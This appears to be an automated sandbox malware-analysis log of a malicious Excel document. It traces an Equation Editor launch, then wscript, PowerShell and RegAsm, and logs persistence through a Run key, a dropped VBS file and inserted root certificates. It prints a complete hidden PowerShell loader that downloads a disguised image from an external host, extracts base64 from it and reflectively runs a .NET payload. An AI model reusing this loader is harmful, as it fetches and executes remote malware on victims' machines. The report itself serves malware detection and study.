            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = '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 to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.EWH/005001/451.871.64.891//:ptth' , '1' , 'C:\ProgramData\' , 'incontrovertido','RegAsm',''))} }"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\incontrovertido.vbsJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: credssp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: shcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\wscript.exeAutomated click: OK
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: Binary string: F:\System.Management.Automation Controle Financeiro Rump fix\obj\Debug\net20\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.466787853.00000000042D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.502494701.00000000093C0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: F:\System.Management.Automation Controle Financeiro Rump fix\obj\Debug\net20\System.Management.Automation.pdbSHA256 source: powershell.exe, 0000000C.00000002.466787853.00000000042D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.502494701.00000000093C0000.00000004.08000000.00040000.00000000.sdmp
            Source: FE430000.0.drInitial sample: OLE indicators vbamacros = False
            Source: Ref19920830281982938RT.xlsInitial sample: OLE indicators encrypted = True

            Data Obfuscation

            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = '
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.EWH/005001/451.871.64.891//:ptth' , '1' , 'C:\ProgramData\' , 'incontrovertido','RegAsm',''))} }"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\incontrovertido.vbs
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,17_2_0041CB50
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 7_2_0062A64C push E0006244h; retn 0062h7_2_0062A651
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 7_2_0062C329 pushad ; ret 7_2_0062C339
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 7_2_0062A8D0 push eax; ret 7_2_0062A8D1
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 7_2_0062A882 push esp; ret 7_2_0062A8CD
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 7_2_0062C388 pushad ; ret 7_2_0062C38D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00457106 push ecx; ret 17_2_00457119
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0045B11A push esp; ret 17_2_0045B141
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0045E54D push esi; ret 17_2_0045E556
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00457A28 push eax; ret 17_2_00457A46
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00434E56 push ecx; ret 17_2_00434E69

            Persistence and Installation Behavior

            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\z2.ink\DavWWWRootJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXESection loaded: netapi32.dll and davhlpr.dll loadedJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00406EB0 ShellExecuteW,URLDownloadToFileW,17_2_00406EB0

            Boot Survival

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\incontrovertido.vbsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,17_2_0041AA4A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run PathJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,17_2_0041CB50
            Source: C:\Windows\SysWOW64\wscript.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
